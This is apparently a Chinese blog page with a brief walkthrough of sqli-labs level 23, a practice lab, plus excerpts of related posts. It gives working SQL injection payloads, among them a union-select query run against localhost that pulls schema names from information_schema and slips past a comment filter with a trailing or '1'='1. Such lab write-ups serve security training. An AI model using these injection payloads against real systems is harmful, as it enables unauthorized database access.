sqli-labs第二十三关（注释过滤绕过）

最新推荐文章于 2024-07-03 16:30:14 发布

mmmmcq

最新推荐文章于 2024-07-03 16:30:14 发布

阅读量635

点赞数 3

CC 4.0 BY-SA版权

分类专栏： sqliabs 文章标签：安全

本文链接：https://blog.youkuaiyun.com/qq_42266432/article/details/120051567

sqliabs 专栏收录该内容

14 篇文章

订阅专栏

本文介绍了如何利用SQL注入技巧，避开源码中的注释过滤机制，成功获取数据库名，并进一步演示了爆库和字段信息获取的过程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

在这里插入图片描述
从源码可知此关将注释符全部过滤掉，需要绕过，使用and ‘1’='1即可

http://localhost:90/sqli-labs-master/Less-23/?id=-1'  union select 111,(select group_concat(schema_name)from information_schema.schemata),3 or '1'='1

这关没什么可说的直接爆库名，接下来爆表，字段啥的就不再演示，此关结束

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

mmmmcq

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

sqli-labs关卡23(基于get提交的过滤注释符的报错注入)

zyh1588的博客

01-15

1286

小白回顾sql靶场23关

Sqli-labs靶场通关（1-20关）

2301_77977773的博客

07-03

1116

为了不影响 80 端口的服务，我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务，我们可以不使用 php-study 配置中的 MySQL，就用主机本身即可，但版本可能需要注意，我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。

参与评论您还未登录，请先登录后发表或查看评论

sql注释符注入防御_【实验】绕过注释符过滤

weixin_39637723的博客

12-21

317

渗透测试工程师(CISP-PTE)超值专题(含本课程)SQL注入经过21年的发展，至今为止依然是OWASP 排名最严重的漏洞，可以看出SQL漏洞危害的严重性和持久性，本节课程从以下几个方面来讲解SQL注入。【理论】SQL注入的业务场景以及危害(1、SQL注入起源 2、为什么会有SQL注入 3、SQL注入的业务场景以及危害 4、不同人群对SQL注入的看法)【实验】真实网站中的SQL注入是怎么样的(通...

sqli-labs第二十三关

m0_73248913的博客

02-19

340

sqli-labs第十二十三关

Sqli-labs Less25-28 绕过过滤函数对字符的过滤 - GET

kevinhanser

08-10

591

本文记录 SQL 注入的学习过程，资料为 SQLi SQLi 博客目录 Less - 25: GET - Error based - All your OR & AND belong to us - String Single Quote 源代码 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; function...

sqli-labs靶场第二十三关

gou1791241251的博客

01-04

569

二十三关传入参数id=1页面正常显示，然后测试闭合方式。当输入单引号时，页面报错，说明很可能是单引号闭合加上注释符号时还是同样报错！！尝试了–+注释和#注释还是一样报错尝试一下加上)括号和)) 还是报错，此时很可能就是注释符号被过滤掉了，没有起到作用使用单引号闭合已经成功了！！可以使用联合查询，报错注入等方式可以来获取数据库信息在这里做一个简单的记录，判断字段数的时候，使用order by 15还是能查询成功，具体问题出现在哪我也不清楚，所以用了另一种可以判断字段数的方法：就是unio

sqli-labs通关（二十三）

qq_65950075的博客

05-08

602

这一关是get类型当输入?id=1'时，出现报错信息，是由单引号闭合的但是输入?id=1'--+的时候，还是报错，说明我们的注释符可能被过滤处理了查看码源，确实是把注释符过滤了那我们还是根据语句构造?成功了判断字段数，这里不能用order by，只能不断往上加数字，不过一般都是3?说明是三个字段，只显示2号位，那我们就可以在这个位置进行注入?

sqli-labs关卡25(基于get提交的过滤and和or的联合注入)

zyh1588的博客

01-16

1504

小白回顾sqli-labs靶场25关

Sqli-labs-master靶场之1-21关通关秘籍

m0_66241651的博客

07-03

940

此靶场就是让我们掌握sql注入的基本方法，通关秘籍来了，轻轻松松搞定！

sqli-labs训练平台靶场详解！！！！

ytdd66的博客

03-19

9177

下面选取几个具有代表性的关卡，演示几种 SQL 注入漏洞利用方法。

19、绕过去除注释符(Get)

Web安全工具库

12-10

505

环境sqli-labs less 23 1、输入?id=1,正常运行 2、输入特殊字符报错 3、单引号闭合，但是发现# --+等都被过滤了 4、使用下面代码闭合 192.168.1.121/sqli/less-23?id=1’ or ‘1’=‘1 5、用union select判断字段数 192.168.1.121/sqli/less-23?id=1’ union select 1,2,...

sqli-labs靶场Less-23 注释绕过

songling515010475的专栏

08-27

327

这里过滤掉了 # 和 -- ，所以这里第一条件就是要让union前面的条件失效，第二就是通过结尾的 and '1'='1 进行绕过 ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() and '1'='1 ...

sqli-labs(十)（过滤注释符）

weixin_30847939的博客

08-29

169

第二十三关：这关还是一个GET型、字符串、单引符号、的有报错的sql注入，输入?id=1' ,页面会报错我们继续按照之前的套路来，先输入?id=1' or '1'='1 页面正常显示，说明这个地方又很有可能存在sql注入。继续输入?id=1' or '1'='1' %23 发现页面居然报错，从报错信息中发现我们的注释符居然没了，说明后台对注释符中做了过滤。像这种情况...

sqli-labs—————Sql注入之盲注讲解

Fly_鹏程万里

05-08

2307

盲注何为盲注？盲注就是在sql注入过程中，sql语句执行的选择后，选择的数据不能回显到前端页面。此时，我们需要利用一些方法进行判断或者尝试，这个过程称之为盲注。盲注分为三类•基于布尔SQL盲注•基于时间的SQL盲注•基于报错的SQL盲注1、基于布尔SQL盲注————构造逻辑判断我们可以利用逻辑判断进行截取字符串相关函数解析 http://blog.youkuaiyun.com/Fly_hps/article...

Sqli-Lab靶场中SQL注入实际操作使用的注释符与数据库中使用的注释符的不同

大大大蜜蜂的博客

10-05

1626

注释原理解释执行的sql语句： select name from usertest where id=1 – 注释测试执行的sql语句： select name from usertest where id=1 #注释测试执行的sql语句： select name from usertest where id=1 /注释测试/ URL：http://www.sqllab.com/Less-1/?id=-1’ union select 1,database(),3 # UR

sqli-labs 通关笔记详解 Less1 - Less10

HAKUNAMATATATTA的博客

12-18

3671

做sqli-labs靶场之前建议补一下基础。

SQL-labs的第23关——注释被屏蔽 union联合查询攻击（Get）

qq_73393033的博客

08-03

306

这说明只有第一个和第二个位置是回显位，我们只需要在这两个位置进行注入就行。其实只有第二个是回显位，第一个也不是。但是如果是3个null，那么不会报错，这说明总共有3个注入位置。我们有添加了)，但是仍然报错，这时我们怀疑注释符被屏蔽了。接下来，我们看一下，那个位置可以进行回显。我们猜测闭合方式是'。说明闭合方式是'，并且注释符被屏蔽了。我们发现这里好像有回显，我们输入语句。使用报错注入也可以。

sqli-labs学习sql注入

qq_46041723的博客

02-29

360

sqli-labs的安装和配置下载sqli-labs和phpstudy(注意PHP study版本不能高于8.0，不然容易出错，本人就是PHP study版本高了，一直出错) 下载完成后将sqli-labs解压放在PHP study的WWW文件夹下打开sqli-labs-master\sql-connections，在里面有一个db-creds.inc文档，打开编辑一般默认用户名、密码都...

sqli-labs/Less-23

m0_71299382的博客

11-19

197

sqli-labs第二十三关

sqli-labs-masterd第六关报错注入查数据